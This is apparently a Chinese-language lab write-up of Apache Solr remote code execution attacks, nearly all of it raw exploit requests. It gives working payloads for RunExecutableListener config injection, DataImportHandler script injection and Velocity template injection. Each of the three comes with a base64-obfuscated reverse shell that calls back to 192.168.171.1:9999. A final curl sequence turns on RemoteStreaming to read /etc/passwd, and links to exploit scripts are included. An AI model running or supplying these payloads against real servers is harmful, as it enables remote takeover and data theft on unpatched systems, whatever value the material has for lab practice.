Apache solr约等于ElecticSearch,是一个开源的搜索引擎。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现,运行在8983端口。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。
curl http://192.168.171.139:8983/solr/demo/select?q=*:*
curl http://192.168.171.139:8983/solr/demo/select?q=id:GB18030TEST
影响版本:
7.1.0之前
poc:
POST /solr/demo/config HTTP/1.1
Host: 192.168.171.139:8983
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 160{"add-listener":{"event":"newSearcher","name":"newlistener11","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","touch /tmp/success"]}}
反弹shell:
POST /solr/demo/config HTTP/1.1
Host: 192.168.171.139:8983
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 236{"add-listener":{"event":"newSearcher","name":"newlistener11212","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"]}}
影响版本:
Apache Solr <8.2.0
http://192.168.171.139:8983/solr/admin/cores
发送数据包&#xff1a;
POST /solr/test/dataimport?_&#61;1565835261600&indent&#61;on&wt&#61;json HTTP/1.1
Host: 192.168.171.139:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 679
Connection: close
Referer: http://localhost:8983/solr/
COOKIE: csrftoken&#61;gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid&#61;snzojzqa5zn187oghf06z6xodulpohprcommand&#61;full-import&verbose&#61;false&clean&#61;false&commit&#61;true&debug&#61;true&core&#61;test&dataConfig&#61;%3CdataConfig%3E%0A&#43;&#43;%3CdataSource&#43;type%3D%22URLDataSource%22%2F%3E%0A&#43;&#43;%3Cscript%3E%3C!%5BCDATA%5B%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;function&#43;poc()%7B&#43;java.lang.Runtime.getRuntime().exec(%22touch&#43;%2Ftmp%2Fsuccess%22)%3B%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;%7D%0A&#43;&#43;%5D%5D%3E%3C%2Fscript%3E%0A&#43;&#43;%3Cdocument%3E%0A&#43;&#43;&#43;&#43;%3Centity&#43;name%3D%22stackoverflow%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;processor%3D%22XPathEntityProcessor%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;forEach%3D%22%2Ffeed%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;transformer%3D%22script%3Apoc%22&#43;%2F%3E%0A&#43;&#43;%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name&#61;dataimport
会在tmp文件夹下创建success文件&#xff1a;
反弹shell&#xff1a;
POST /solr/test/dataimport?_&#61;1638356269667&indent&#61;on&wt&#61;json HTTP/1.1
Host: 192.168.171.139:8983
Content-Length: 782
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-type: application/x-www-form-urlencoded
Origin: http://192.168.171.139:8983
Referer: http://192.168.171.139:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q&#61;0.9
Connection: closecommand&#61;full-import&verbose&#61;false&clean&#61;false&commit&#61;true&debug&#61;true&core&#61;test&dataConfig&#61;%3CdataConfig%3E%0A&#43;&#43;%3CdataSource&#43;type%3D%22URLDataSource%22%2F%3E%0A&#43;&#43;%3Cscript%3E%3C!%5BCDATA%5B%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;function&#43;poc()%7B&#43;java.lang.Runtime.getRuntime().exec(%22bash&#43;-c&#43;%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22)%3B%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;%7D%0A&#43;&#43;%5D%5D%3E%3C%2Fscript%3E%0A&#43;&#43;%3Cdocument%3E%0A&#43;&#43;&#43;&#43;%3Centity&#43;name%3D%22stackoverflow%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;processor%3D%22XPathEntityProcessor%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;forEach%3D%22%2Ffeed%22%0A&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;transformer%3D%22script%3Apoc%22&#43;%2F%3E%0A&#43;&#43;%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name&#61;dataimport
添入其中的命令一定要经过base64编码&#xff0c;因为java的exec函数不支持>
符号&#xff0c;所以需要将命令转化为无这种符号的形式&#xff0c;并且还需要将编码转化为base64:
也可以使用exp&#xff1a;
https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192/blob/master/solr_RCE.py
在其 5.0.0 到 8.3.1版本中&#xff0c;用户可以注入自定义模板&#xff0c;通过Velocity模板语言执行任意命令。
先确定core&#xff1a;
curl http://192.168.171.139:8983/solr/admin/cores
发现核心名为demo
默认情况下params.resource.loader.enabled配置未打开&#xff0c;无法使用自定义模板。通过发送下面的请求打开对应核心的配置&#xff1a;
POST /solr/demo/config HTTP/1.1
Host: 192.168.171.139:8983
Content-Type: application/json
Content-Length: 259{"update-queryresponsewriter": {"startup": "lazy","name": "velocity","class": "solr.VelocityResponseWriter","template.base.dir": "","solr.resource.loader.enabled": "true","params.resource.loader.enabled": "true"}
}
执行命令&#xff1a;
GET /solr/demo/select?q&#61;1&&wt&#61;velocity&v.template&#61;custom&v.template.custom&#61;%23set($x&#61;%27%27)&#43;%23set($rt&#61;$x.class.forName(%27java.lang.Runtime%27))&#43;%23set($chr&#61;$x.class.forName(%27java.lang.Character%27))&#43;%23set($str&#61;$x.class.forName(%27java.lang.String%27))&#43;%23set($ex&#61;$rt.getRuntime().exec(%27id%27))&#43;$ex.waitFor()&#43;%23set($out&#61;$ex.getInputStream())&#43;%23foreach($i&#43;in&#43;[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 192.168.171.139:8983
Cache-Control: max-age&#61;0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,image/avif,image/webp,image/apng,*/*;q&#61;0.8,application/signed-exchange;v&#61;b3;q&#61;0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q&#61;0.9
Connection: close
反弹shell&#xff1a;
GET /solr/demo/select?q&#61;1&&wt&#61;velocity&v.template&#61;custom&v.template.custom&#61;%23set($x&#61;%27%27)&#43;%23set($rt&#61;$x.class.forName(%27java.lang.Runtime%27))&#43;%23set($chr&#61;$x.class.forName(%27java.lang.Character%27))&#43;%23set($str&#61;$x.class.forName(%27java.lang.String%27))&#43;%23set($ex&#61;$rt.getRuntime().exec(%22bash&#43;-c&#43;%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22))&#43;$ex.waitFor()&#43;%23set($out&#61;$ex.getInputStream())&#43;%23foreach($i&#43;in&#43;[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 192.168.171.139:8983
Cache-Control: max-age&#61;0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,image/avif,image/webp,image/apng,*/*;q&#61;0.8,application/signed-exchange;v&#61;b3;q&#61;0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q&#61;0.9
Connection: close
也可直接使用exp&#xff1a;
https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template
# 获取core名&#xff0c;这里假设得到的core名字为demo
curl http://192.168.171.139:8983/solr/admin/cores?indexInfo&#61;false&wt&#61;json | grep name
# 开启RemoteStreaming
curl -i -s -k -X $&#39;POST&#39; \-H $&#39;Content-Type: application/json&#39; --data-binary $&#39;{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}&#39; \$&#39;http://192.168.171.139:8983/solr/demo/config&#39;
# 读取/etc/passwd
curl -i -s -k &#39;http://192.168.171.139:8983/solr/demo/debug/dump?param&#61;ContentStreams&stream.url&#61;file:///etc/passwd&#39;
vulhub
Apache-Solr-RCE集合